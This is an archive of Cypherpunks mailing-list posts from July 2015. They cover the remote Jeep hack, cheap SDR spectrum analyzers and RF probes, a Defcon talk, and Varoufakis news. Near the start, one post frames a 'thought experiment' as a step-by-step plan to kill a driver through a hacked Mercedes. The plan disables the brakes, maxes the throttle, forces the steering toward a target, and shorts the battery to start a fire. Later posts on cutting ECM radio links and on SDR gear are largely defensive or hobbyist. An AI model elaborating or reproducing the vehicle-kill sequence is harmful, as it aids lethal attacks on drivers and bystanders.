<55B2734F.2010904@riseup.net> <55B2CE54.8020301@riseup.net> Message-ID: On 7/24/15, M373 wrote: > It's not a matter of credulity in believing that authorities would carry > out such an assassination, the problem is asserting such an act without > direct evidence. As I said, and as insider Richard Clarke said, it would > be difficult to show. this came up in a separate context, so thought experiment: let's assume a rogue contractor, not US establishment in any official manner is our hypothetical malicious actor in this situation. let's assume they acted to maximize effectiveness at the expense of identifying characteristics. let's construct a scenario for replay in situ to compare? dialed to MAX DEATH! [ not s t e a l t h . . . ] --- 2013 Mercedes, through MBRACE hack you attain full authority over: - Central Control Module (CCM) - Central Timing Module (CTM) - Electronic/engine Control Module (ECM) - Engine control unit (ECU) - Powertrain Control Module (PCM) - Transmission Control Module (TCM) - Speed control unit (SCU) - Brake Control Module (BCM or EBCM) - Vehicle Control Module (VCM) Electronic Powersteering (EPS) - General Electronic Module (GEM) - Body Control Module (BCM) - Suspension Control Module (SCM) - Telematic control unit (TCU) - Battery management system begin attack!>> 0. ... delay tipping until target location, speed, orientation RDY ... 1. EBCM disable, zero halt 2. PCM fix in mid gear, prep to redline 3. ECM throttle position to maximum 4. VCM EPS to remote drive override, E.g. swerve to target 5. SCU, TCU monitor for rapid deceleration then, immediately: 5a. ECM fuel pumps to max flow rate 5b. GEM set all lights, indicators, fans, servos, etc. to ON 5c. Battery management system destructively short discharge [ AKA, incendiary mode ] now compare this collision with expected outcomes of human at the wheel using normative controls. best regards, codermange who love his '67 Chevy C20 long bed farm truck more each day :) From guninski at guninski.com Sat Jul 25 05:33:47 2015 From: guninski at guninski.com (Georgi Guninski) Date: Sat, 25 Jul 2015 15:33:47 +0300 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> <20150725104404.GB2556@sivokote.iziade.m$> Message-ID: <20150725123347.GC2556@sivokote.iziade.m$> On Sat, Jul 25, 2015 at 03:58:48AM -0700, coderman wrote: > On 7/25/15, coderman wrote: > >... > > two points of clarification: > > 1. there is assumption that information is silo'ed, also cannot be shared. not! > > 2. the difficulty regarding SprintPCS is that their lease space spans class A's. > see https://peertech.org/files/cidr-privacy-space-cell-data-2009.txt > for a unique set sample across five devices for a month in a > particular configuration at a single tower. for example. > > this is why the mandatory Sprint block was actually an unconventional > but exceptionally effective mitigation for this path to remote > control. > > > best regards, Do you mean for additional ownage one needs network sploits? Is Sprint's network equipment up to date and safe? (Having in mind Cisco/BGP and the like we doubt it) From s at ctrlc.hu Sat Jul 25 12:40:03 2015 From: s at ctrlc.hu (stef) Date: Sat, 25 Jul 2015 21:40:03 +0200 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: References: <55B2DD10.7090600@riseup.net> <20150725113747.GD6906@ctrlc.hu> Message-ID: <20150725193959.GE6906@ctrlc.hu> On Sat, Jul 25, 2015 at 12:25:56PM -0700, Seth wrote: > On Sat, 25 Jul 2015 04:37:47 -0700, stef wrote: > >can you post this in some less fuckd up way than this copypaste crap? > >are there some urls, that could be simply curled for example? > > I heard you screamin', the copypasta was extremely lame, I'm forwarding to > Shelley who volunteered to perform proper text processing/formatting after > which the extracted contents will be posted to the list. thanks :) -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From jdb10987 at yahoo.com Sat Jul 25 18:06:12 2015 From: jdb10987 at yahoo.com (jim bell) Date: Sun, 26 Jul 2015 01:06:12 +0000 (UTC) Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B3EBED.5060702@riseup.net> References: <55B3EBED.5060702@riseup.net> Message-ID: <270760644.2684776.1437872772106.JavaMail.yahoo@mail.yahoo.com> From: Razer On 07/24/2015 07:25 PM, Steve Kinney wrote: > > Need some volunteers and/or a funding angel to create a corpus of > howto docs that identify the RF receiver parts in automotive ECM > units and their associated wiring harnesses, including which pins > to cut to assure radio silence in both directions. RF sniffers are common electronic equipment. Keychain wireless networks detectors and all that. Just pay attention to where your hands wander attempting to pinpoint the rf source's location, HEI ignition systems, fan belts , whirling parts etc, maim and kill. There are some rather economical spectrum analyzers being sold today.   Example:  http://www.triarchytech.com/?gclid=Cj0KEQjw58ytBRDMg-HVn4LuqasBEiQAhPkhuqJwqFbZdZZCT5H96z3jdwFEddz79Kx-HDL_DEqJCrYaAmko8P8HAQ http://www.flyteccomputers.com/Spectrum-Analyzer http://nutsaboutnets.com/rfviewer/ http://www.ebay.com/itm/USB-RF-Spectrum-Analyzer-3-3GHZ-/281757383569 Some of the devices I've seen advertised may only be WiFi-signal capable.  Somebody doing this work seriously should probably get a full-spectrum unit, from low-tens-of-megahertz to 5 GHz or so. Of course, there is this:http://www.ebay.com/itm/Tektronix-494P-Tek-Spectrum-Analyzer-with-Cover-Works-GPIB-Tested-and-Works-/291518180539?pt=LH_DefaultDomain_0&hash=item43dfd66cbb Ironically, the newer, cheaper units may be much better for your task, in part because the USB spectrum analyzers can be put on the end of a USB cable, and they therefore interface directly with modern computers.                Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5984 bytes Desc: not available URL: From wirelesswarrior at safe-mail.net Sun Jul 26 10:51:38 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Sun, 26 Jul 2015 13:51:38 -0400 Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep on the Highway) Message-ID: -------- Original Message -------- From: Peter Gutmann Apparently from: cypherpunks-bounces at cpunks.org To: jdb10987 at yahoo.com Cc: cypherpunks at cpunks.org Subject: Re: Hackers Remotely Kill a Jeep on the Highway Date: Sun, 26 Jul 2015 21:42:14 +1200 > jim bell writes: > > >There are some rather economical spectrum analyzers being sold today. > > You have to be careful with those, the straight USB-dongle ones are going to > be SDR-based, typically the RTL820T meant for DVB-T use (and re-purposed by > half the hacking world for all manner of other things), then you have the USB- > interface ones with more powerful SDRs, and finally you've got purpose-build > spectrum analysers. Compared to the real thing, you're going to run into > severely limited bandwidth (anything that spreads the signal across a wide > spectrum is going to be difficult to impossible to deal with), and not-so- > spectacular signal handling (there's a reason why the real thing costs > thousands of dollars). > > That's not to say that they're no good, just that you need to be aware that > you're getting what you pay for. If you've got a specific purpose in mind, > check first that whatever you're getting will be able to do the job. There's > quite a bit of material out there on this, google something like "sdr spectrum > analyzer" to find articles on it. > > Peter. Achieving receivers and spectrum analyzers with wide frequency coverage, high dynamic range and wide bandwidths (with very low noise circuitry, stable local oscillators, etc.) simultaneiously has, up till recently, demanded very high prices. That's why few outside of governments, corporations and well-funded professionals could afford them. However, with the rapid growth and falling prices of SDR this has and is changing. For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000, that not long ago were in the $10,000s. The HackRF (which some have complained is little more than an IF strip) effectively covering down to below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is not in the same league as the 16-bit USRPs). If some hardware hacker were to deliver a 14-16 bit ADC daughter board (there are afforadble chips offering up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it could substantially improve its use. WW From wirelesswarrior at safe-mail.net Sun Jul 26 11:21:10 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Sun, 26 Jul 2015 14:21:10 -0400 Subject: SIGINT and improving wireless privacy at the PHY Message-ID: I will be co-presenting a paper, with Ettus' Balint Seeber, at Defcon 23 (Balint will also be presenting a separate, coordinated, paper). http://www.wirelessvillage.ninja/speakersched.html WW From coderman at gmail.com Sun Jul 26 17:04:36 2015 From: coderman at gmail.com (coderman) Date: Sun, 26 Jul 2015 17:04:36 -0700 Subject: SIGINT and improving wireless privacy at the PHY In-Reply-To: References: Message-ID: On 7/26/15, wirelesswarrior at safe-mail.net wrote: > I will be co-presenting a paper, with Ettus' Balint Seeber, at Defcon 23 > (Balint will also be presenting a separate, coordinated, paper). > > http://www.wirelessvillage.ninja/speakersched.html looking forward to it! this is the active front of communication availability and privacy... From jya at pipeline.com Sun Jul 26 15:38:07 2015 From: jya at pipeline.com (John Young) Date: Sun, 26 Jul 2015 18:38:07 -0400 Subject: Varoufakis claims had approval to plan parallel banking system for Greece Message-ID: Varoufakis claims had approval to plan parallel banking system for Greece http://www.ekathimerini.com/199945/article/ekathimerini/news/varoufakis-claims-had-approval-to-plan-parallel-banking-system Allegedly aided by Columbia University IT professor to design a hack of existing taxation systems. Columbia Computer Science Faculty http://www.cs.columbia.edu/people/faculty From admin at pilobilus.net Sun Jul 26 15:52:03 2015 From: admin at pilobilus.net (Steve Kinney) Date: Sun, 26 Jul 2015 18:52:03 -0400 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <270760644.2684776.1437872772106.JavaMail.yahoo@mail.yahoo.com> References: <55B3EBED.5060702@riseup.net> <270760644.2684776.1437872772106.JavaMail.yahoo@mail.yahoo.com> Message-ID: <55B56493.7020603@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/25/2015 09:06 PM, jim bell wrote: > *From:* Razer On 07/24/2015 07:25 PM, Steve > Kinney wrote: > > >> >> Need some volunteers and/or a funding angel to create a >> corpus of howto docs that identify the RF receiver parts in >> automotive ECM units and their associated wiring harnesses, >> including which pins to cut to assure radio silence in both >> directions. > > RF sniffers are common electronic equipment. Keychain wireless > networks detectors and all that. Just pay attention to where > your hands wander attempting to pinpoint the rf source's > location, HEI ignition systems, fan belts , whirling parts etc, > maim and kill. [ ... ] Any bench tech with access to publicly available documentation - and the physical hardware - should be able to identify the RF components in any automotive control system without too much trouble. ECM units are fairly well RF isolated, so those that talk to the world should normally have easily identified connections to external antennas. High frequency transceiver components usually have their own RF shielded areas on the board as well. Cutting one wire or IC pin per unit (antenna or IC power) should isolate it from remote access. If necessary functions fail, undo the mod and try elsewhere until the desired results are obtained. In the U.S., getting hold of ECMs to play with presents some inconveniences: Junk yards pull ECMs and sell them back to their manufacturers - some nonsense about "intellectual property" seems to be involved - so there aren't many available on the open market to play with. But where there's a will, a few dollars and a small pile of pointy tools, there's a way. :o) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVtWSRAAoJEDZ0Gg87KR0LoLkP/Rdod+ZI9btH2wCJK19VGkYy RoXdALV49AtAxMWJ+iTxVowTSNpX2aD5rCer3IAC48HbS6GWT46g0t6zwfp0gF1r Erg+Cr2ezSvzfhepcWAMGTxM6KkvkK2roDAzXW88lD5FPSNb9SWoC/MJ9qXb2VMX OZW8AIbPrcV1Q8UWChbQlI8YIASAfH0+w+EVq7oimynauwlPfBTQP365UW/aLk4Q rzanQoEOIKtwU7hWVfNBlCisLVWpQwXQiRrg3a+nTa1Px/ZeVJPiG2Kw8w3GLFJS CIoOdwVAGKeJKW4oGCmegqAIwlrqzH5Qo5LXvkGK+I5vdG8IttLeYqTksfgmkBpu p9rHr+TPTMr/4KaPDC7ZA6424B3Yf6C1pcrQ95hk5pBD5zVShroP4yYXF6rkryX4 LMKf+9pPG7uKJy9hI7c/8QnSzg55LK4h5/5kVe6dVbU4lvQIORhGFVk8pIP3HR7o N/+9Thbdk/eYk/x2iB+EcCmTSehc1elCHNrkZllzG4m0wSLXpLF5Jj0nzBZWgspP UN1QanHNOeydzgsxTOkzxHuU8RlsXxhZMUXCGP+Ynd38MuwQl+jt4SVcmTFvoC/p akEz8reODtNfVLAlCCLh1Eu7MxHRByFyV4kAkiUagAfw9JNpDzMtHycC6wqw24B0 0DNAlMG3kj/leuzF9gZS =aNZ0 -----END PGP SIGNATURE----- From jason.mcvetta at gmail.com Sun Jul 26 21:01:22 2015 From: jason.mcvetta at gmail.com (Jason McVetta) Date: Sun, 26 Jul 2015 21:01:22 -0700 Subject: SIGINT and improving wireless privacy at the PHY In-Reply-To: References: Message-ID: The server at www.wirelessvillage.ninja sez: "Chances are, if you got this page, that means the server doesn't like something about you. You may be using an invalid HTTP option, or an evil browser string, or maybe just from a country we are leery of." Trying to view using Firefox on Android over Viettel 3G. Are you guys blocking all of Vietnam? -- sent from my robot On Jul 27, 2015 1:24 AM, wrote: > I will be co-presenting a paper, with Ettus' Balint Seeber, at Defcon 23 > (Balint will also be presenting a separate, coordinated, paper). > > http://www.wirelessvillage.ninja/speakersched.html > > WW > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1047 bytes Desc: not available URL: From pgut001 at cs.auckland.ac.nz Sun Jul 26 02:42:14 2015 From: pgut001 at cs.auckland.ac.nz (Peter Gutmann) Date: Sun, 26 Jul 2015 21:42:14 +1200 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <270760644.2684776.1437872772106.JavaMail.yahoo@mail.yahoo.com> Message-ID: jim bell writes: >There are some rather economical spectrum analyzers being sold today. You have to be careful with those, the straight USB-dongle ones are going to be SDR-based, typically the RTL820T meant for DVB-T use (and re-purposed by half the hacking world for all manner of other things), then you have the USB- interface ones with more powerful SDRs, and finally you've got purpose-build spectrum analysers. Compared to the real thing, you're going to run into severely limited bandwidth (anything that spreads the signal across a wide spectrum is going to be difficult to impossible to deal with), and not-so- spectacular signal handling (there's a reason why the real thing costs thousands of dollars). That's not to say that they're no good, just that you need to be aware that you're getting what you pay for. If you've got a specific purpose in mind, check first that whatever you're getting will be able to do the job. There's quite a bit of material out there on this, google something like "sdr spectrum analyzer" to find articles on it. Peter. From pgut001 at cs.auckland.ac.nz Sun Jul 26 16:25:43 2015 From: pgut001 at cs.auckland.ac.nz (Peter Gutmann) Date: Sun, 26 Jul 2015 23:25:43 +0000 Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep on the Highway) In-Reply-To: References: Message-ID: <9A043F3CF02CD34C8E74AC1594475C73AB070C77@uxcn10-tdc05.UoA.auckland.ac.nz> wirelesswarrior at Safe-mail.net writes: >For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000, >that not long ago were in the $10,000s. The HackRF (which some have >complained is little more than an IF strip) effectively covering down to >below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is >not in the same league as the 16-bit USRPs). If some hardware hacker were to >deliver a 14-16 bit ADC daughter board (there are afforadble chips offering >up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it >could substantially improve its use. The problem with the HackRF (and other USB-based devices) is the bandwidth of the USB connection, it's not that the HackRF hardware can't handle it, it's that you can't get that much data to the PC. (I have a HackRF - I needed a cheap way to track down some odd RFI issues - and it's a pretty cool piece of hardware for the money, but, as I mentioned earlier, you do get what you're paying for. If I could make a wishlist, it'd be nice to have a rev.2 with some work done on the front- end...). Peter. From carimachet at gmail.com Sun Jul 26 20:39:15 2015 From: carimachet at gmail.com (Cari Machet) Date: Mon, 27 Jul 2015 06:39:15 +0300 Subject: Varoufakis claims had approval to plan parallel banking system for Greece In-Reply-To: References: Message-ID: wonder if said IT prof gonna get a little visit fr the federali's > capitalist fascist parasites On Mon, Jul 27, 2015 at 1:38 AM, John Young wrote: > Varoufakis claims had approval to plan parallel banking system for Greece > > > http://www.ekathimerini.com/199945/article/ekathimerini/news/varoufakis-claims-had-approval-to-plan-parallel-banking-system > > Allegedly aided by Columbia University IT professor to design a hack of > existing taxation systems. > > Columbia Computer Science Faculty > > http://www.cs.columbia.edu/people/faculty > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2289 bytes Desc: not available URL: From jya at pipeline.com Mon Jul 27 04:13:40 2015 From: jya at pipeline.com (John Young) Date: Mon, 27 Jul 2015 07:13:40 -0400 Subject: Varoufakis ridicules GR taxation hacking story In-Reply-To: <20150727103431.GA2558@sivokote.iziade.m$> References: <20150727103431.GA2558@sivokote.iziade.m$> Message-ID: twitter.com/yanisvaroufakis/status/625336067831558144 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 131 bytes Desc: not available URL: From Rayzer at riseup.net Mon Jul 27 10:46:03 2015 From: Rayzer at riseup.net (Razer) Date: Mon, 27 Jul 2015 10:46:03 -0700 Subject: How do cookies on Twitter give me "safer experience"? In-Reply-To: <20150727143624.GC2558@sivokote.iziade.m$> References: <20150727143624.GC2558@sivokote.iziade.m$> Message-ID: <55B66E5B.7000902@riseup.net> On 07/27/2015 07:36 AM, Georgi Guninski wrote: > With javascript and cookies disabled, go to https://twitter.com/ > > Orange CSS shit which can't be closed with the "X" suggests: > >> Cookies help personalize Twitter content ... and provide you with a >> better, faster, safer Twitter experience. By using our services, you >> agree to our Cookie Use. > Me fails to see how browsing Twitter with cookies enabled makes me > any any safer. > > How so? > Beyond the conspiratorial, perhaps the cookie contains the switch for the NSFW function account owners use when their tweets are... ... nsfw? RR -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From s at ctrlc.hu Mon Jul 27 02:14:27 2015 From: s at ctrlc.hu (stef) Date: Mon, 27 Jul 2015 11:14:27 +0200 Subject: SIGINT and improving wireless privacy at the PHY In-Reply-To: References: Message-ID: <20150727091426.GG6906@ctrlc.hu> On Sun, Jul 26, 2015 at 09:01:22PM -0700, Jason McVetta wrote: > The server at www.wirelessvillage.ninja sez: "Chances are, if you got this > page, that means the server doesn't like something about you. You may be > using an invalid HTTP option, or an evil browser string, or maybe just from > a country we are leery of." same from some random tor exitnode. the ops seem to hate freedom or at least anon visitors -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From wirelesswarrior at safe-mail.net Mon Jul 27 08:21:13 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Mon, 27 Jul 2015 11:21:13 -0400 Subject: SIGINT and improving wireless privacy at the PHY Message-ID: Probably the result of DDoS and other exploit attacks against the site. > On Sun, Jul 26, 2015 at 09:01:22PM -0700, Jason McVetta wrote: > > The server at www.wirelessvillage.ninja sez: "Chances are, if you got this > > page, that means the server doesn't like something about you. You may be > > using an invalid HTTP option, or an evil browser string, or maybe just from > > a country we are leery of." > > same from some random tor exitnode. the ops seem to hate freedom or at least > anon visitors > > -- > otr fp: https://www.ctrlc.hu/~stef/otr.txt From guninski at guninski.com Mon Jul 27 03:34:31 2015 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 27 Jul 2015 13:34:31 +0300 Subject: Varoufakis claims had approval to plan parallel banking system for Greece In-Reply-To: References: Message-ID: <20150727103431.GA2558@sivokote.iziade.m$> On Sun, Jul 26, 2015 at 06:38:07PM -0400, John Young wrote: > Varoufakis claims had approval to plan parallel banking system for Greece > > http://www.ekathimerini.com/199945/article/ekathimerini/news/varoufakis-claims-had-approval-to-plan-parallel-banking-system > > Allegedly aided by Columbia University IT professor to design a > hack of existing taxation systems. > > Columbia Computer Science Faculty > > http://www.cs.columbia.edu/people/faculty >From TFA (looking for the best, but expecting the worst): === “But let me give you an example. We were planning along a number fronts. I will just mention one. Take the case of the first few moments when the banks are shut, the ATMs don’t function and there has to be some parallel payment system by which to keep the economy going for a little while, to give the population the feel that the state is in control and that there is a plan.” === From wirelesswarrior at safe-mail.net Mon Jul 27 10:45:02 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Mon, 27 Jul 2015 13:45:02 -0400 Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep onthe Highway) Message-ID: Peter and Jim, -------- Original Message -------- From: jim bell To: Peter Gutmann , "wirelesswarrior at Safe-mail.net" Cc: "cypherpunks at cpunks.org" Subject: Re: Intercept receivers (was Re: Hackers Remotely Kill a Jeep onthe Highway) Date: Mon, 27 Jul 2015 15:31:17 +0000 (UTC) From: Peter Gutmann wirelesswarrior at Safe-mail.net writes: >>For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000, .>>that not long ago were in the $10,000s. The HackRF (which some have >>complained is little more than an IF strip) effectively covering down to >>below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is >>not in the same league as the 16-bit USRPs). If some hardware hacker were to >>deliver a 14-16 bit ADC daughter board (there are afforadble chips offering >>up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it >>could substantially improve its use. >The problem with the HackRF (and other USB-based devices) is the bandwidth of >the USB connection, it's not that the HackRF hardware can't handle it, it's >that you can't get that much data to the PC. The HackRF contains a LPC4320 which has unused capacity for light DSP and other tasking. For any heavy DSP it could use a FPGA. It has an internal header for expansions like this (and/or a higher resolution ADC and its CPLD can be reflashed to accomodate such changes. >(I have a HackRF - I needed a cheap way to track down some odd RFI issues - >and it's a pretty cool piece of hardware for the money, but, as I mentioned >earlier, you do get what you're paying for. If I could make a wishlist, it'd >be nice to have a rev.2 with some work done on the front- end...). The HackRF, like all wideband, direct conversion, receivers, can suffer LNA saturation from nearby/very strong out-of-band signals (pagers and FM broadcasts). A cheap, simple, solution is a coax notch filter, in line with the antenna. I've been experimenting with these and they seem to work very well. From: jim bell Here's my idea for a probe for an RF device. The wavelength of a 2.45 GHz signal (WiFi) is about 12 cm. A quarter-wave antenna would be 3 cm. Or, that 3 cm could be in the form of a loop, at the end of a piece of.'hardline', or other coaxial cable. (hardline would be best, I think, because it is a small diameter. ) https://en.wikipedia.org/wiki/Coaxial_cable So, the diameter of the loop would be a bit more than 1 cm diameter, which is appropriate for finding tiny RF sources. One side of the loop would be connected to the center conductor of the coax, and the other side of the loop connected to the shield of the coax. Note: The coax should probably have many dissipative RF beads strung along its length, in order to prevent the cable itself from picking up RF, and delivering to the loop on the end, thereby to be detected. http://www.amidoncorp.com/small-ferrite-beads/ There are many different kinds of materials that such beads are made from; perhaps we can have an RF engineer chime in on the subject. He can also tell us if the loop is too-badly mismatched (RF impedence) to the coax to function well. Jim Bell Try it! -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 6462 bytes Desc: not available URL: From jdb10987 at yahoo.com Mon Jul 27 08:31:17 2015 From: jdb10987 at yahoo.com (jim bell) Date: Mon, 27 Jul 2015 15:31:17 +0000 (UTC) Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep on the Highway) In-Reply-To: <9A043F3CF02CD34C8E74AC1594475C73AB070C77@uxcn10-tdc05.UoA.auckland.ac.nz> References: <9A043F3CF02CD34C8E74AC1594475C73AB070C77@uxcn10-tdc05.UoA.auckland.ac.nz> Message-ID: <2037801709.3450009.1438011077656.JavaMail.yahoo@mail.yahoo.com> From: Peter Gutmann wirelesswarrior at Safe-mail.net writes: >>For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000, .>>that not long ago were in the $10,000s. The HackRF (which some have >>complained is little more than an IF strip) effectively covering down to >>below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is >>not in the same league as the 16-bit USRPs). If some hardware hacker were to >>deliver a 14-16 bit ADC daughter board (there are afforadble chips offering >>up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it >>could substantially improve its use. >The problem with the HackRF (and other USB-based devices) is the bandwidth of >the USB connection, it's not that the HackRF hardware can't handle it, it's >that you can't get that much data to the PC. >(I have a HackRF - I needed a cheap way to track down some odd RFI issues - >and it's a pretty cool piece of hardware for the money, but, as I mentioned >earlier, you do get what you're paying for.  If I could make a wishlist, it'd >be nice to have a rev.2 with some work done on the front- end...). Here's my idea for a probe for an RF device.  The wavelength of a 2.45 GHz signal (WiFi) is about 12 cm.  A quarter-wave antenna would be 3 cm.  Or, that 3 cm could be in the form of a loop, at the end of a piece of.'hardline', or other coaxial cable.   (hardline would be best, I think, because it is a small diameter.  )        https://en.wikipedia.org/wiki/Coaxial_cable   So, the diameter of the loop would be a bit more than 1 cm diameter, which is appropriate for finding tiny RF sources.  One side of the loop would be connected to the center conductor of the coax, and the other side of the loop connected to the shield of the coax. Note:  The coax should probably have many dissipative RF beads strung along its length, in order to prevent the cable itself from picking up RF, and delivering to the loop on the end, thereby to be detected.  http://www.amidoncorp.com/small-ferrite-beads/     There are many different kinds of materials that such beads are made from; perhaps we can have an RF engineer chime in on the subject.  He can also tell us if the loop is too-badly mismatched (RF impedence) to the coax to function well.               Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5190 bytes Desc: not available URL: From guninski at guninski.com Mon Jul 27 05:38:23 2015 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 27 Jul 2015 15:38:23 +0300 Subject: Varoufakis claims had approval to plan parallel banking system for Greece In-Reply-To: <01707B7A-7FC8-4220-8001-57567A44C59B@soydelbierzo.com> References: <20150727103431.GA2558@sivokote.iziade.m$> <01707B7A-7FC8-4220-8001-57567A44C59B@soydelbierzo.com> Message-ID: <20150727123823.GB2558@sivokote.iziade.m$> On Mon, Jul 27, 2015 at 01:11:51PM +0200, Jorge SoydelBierzo wrote: > > Varoufakis denies this info http://twitter.com/yanisvaroufakis/status/625336067831558144 > > Don't know what the truth is. >From TFA: === Recorded call You can find extracts from the conversation below. Varoufakis was advised that the call was being recorded when it began. === === Normal Lamont interrupts: "There are certainly others listening but they will not tell it to their friends." Varoufakis (laughing): "I know. I know they are. And even if they do I will deny I said it === > > El 27/7/2015, a las 12:34, Georgi Guninski escribió: > > > >> On Sun, Jul 26, 2015 at 06:38:07PM -0400, John Young wrote: > >> Varoufakis claims had approval to plan parallel banking system for Greece > >> > >> http://www.ekathimerini.com/199945/article/ekathimerini/news/varoufakis-claims-had-approval-to-plan-parallel-banking-system > >> > >> Allegedly aided by Columbia University IT professor to design a > >> hack of existing taxation systems. > >> > >> Columbia Computer Science Faculty > >> > >> http://www.cs.columbia.edu/people/faculty > > > > From TFA (looking for the best, but expecting the worst): > > > > === > > “But let me give you an example. We were planning along a number fronts. > > I will just mention one. Take the case of the first few moments when the > > banks are shut, the ATMs don’t function and there has to be some > > parallel payment system by which to keep the economy going for a little > > while, to give the population the feel that the state is in control and > > that there is a plan.” > > === > > > > > > From guninski at guninski.com Mon Jul 27 07:36:24 2015 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 27 Jul 2015 17:36:24 +0300 Subject: How do cookies on Twitter give me "safer experience"? Message-ID: <20150727143624.GC2558@sivokote.iziade.m$> With javascript and cookies disabled, go to https://twitter.com/ Orange CSS shit which can't be closed with the "X" suggests: > Cookies help personalize Twitter content ... and provide you with a > better, faster, safer Twitter experience. By using our services, you > agree to our Cookie Use. Me fails to see how browsing Twitter with cookies enabled makes me any any safer. How so? From carimachet at gmail.com Mon Jul 27 07:39:43 2015 From: carimachet at gmail.com (Cari Machet) Date: Mon, 27 Jul 2015 17:39:43 +0300 Subject: Varoufakis ridicules GR taxation hacking story In-Reply-To: References: <20150727103431.GA2558@sivokote.iziade.m$> Message-ID: taking a little poll its sort of interrelated why do people think that the fbi conducted > thru jeremy hammond > hacks of other governments stuff for instance the universities, hospitals, oil companies that are state run On Mon, Jul 27, 2015 at 2:13 PM, John Young wrote: > twitter.com/yanisvaroufakis/status/625336067831558144 > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1909 bytes Desc: not available URL: From admin at pilobilus.net Mon Jul 27 17:00:06 2015 From: admin at pilobilus.net (Steve Kinney) Date: Mon, 27 Jul 2015 20:00:06 -0400 Subject: SIGINT and improving wireless privacy at the PHY In-Reply-To: References: Message-ID: <55B6C606.6090106@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/27/2015 11:21 AM, wirelesswarrior at safe-mail.net wrote: > Probably the result of DDoS and other exploit attacks against > the site. > >> On Sun, Jul 26, 2015 at 09:01:22PM -0700, Jason McVetta >> wrote: >>> The server at www.wirelessvillage.ninja sez: "Chances are, >>> if you got this page, that means the server doesn't like >>> something about you. You may be using an invalid HTTP >>> option, or an evil browser string, or maybe just from a >>> country we are leery of." >> >> same from some random tor exitnode. the ops seem to hate >> freedom or at least anon visitors They seem to be subscribed to some list of TOR exit nodes and filter against that. I tried connecting via 3 nodes, 2 worked normally and one returned the polite FU notice. :o) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVtsYCAAoJEDZ0Gg87KR0LYCgP/2cS3uDKHIebOC2qsLaGdUro 3tr3xX9JjMesYQf9KbQMX3l/ST0dMqRf8TO5TwRnps3h+nkxyLDfMid6M4sxKixU DF3cBpsPS2riopnLmIU3C+060YIUhMys45nyhdQ56rsum7kKVScSuWEiBbKus6uu ihly5CeBN0F9Hodag1JbpXN/5N+fF4ypnI/YzXXuVHKjglkTuGAQLSiOJZTVarEA p9N24LDAiZbln1IEXyEH/wV/OIVbyBmk3TIvT6QY//ej5tCS7V2KXUNbVNsHLKtp yKqdHxsshbKembgA5Ucv2tnw6mc2a5wfnXhozXI1f5cQeULBCyxOiVA/8z9iLCbH sfklmYyMArYTjCNEFMVTpnHlPZi2jCzOX8QXSojJoq+Up2L2zkh6oL2OT+p1sXB3 Fm1l5yHNf6DrcWTY9dPrWi+xB0tHQ3eWNZHN6HDeXMCy4vBvf3PrJgCK9pl4tWyK 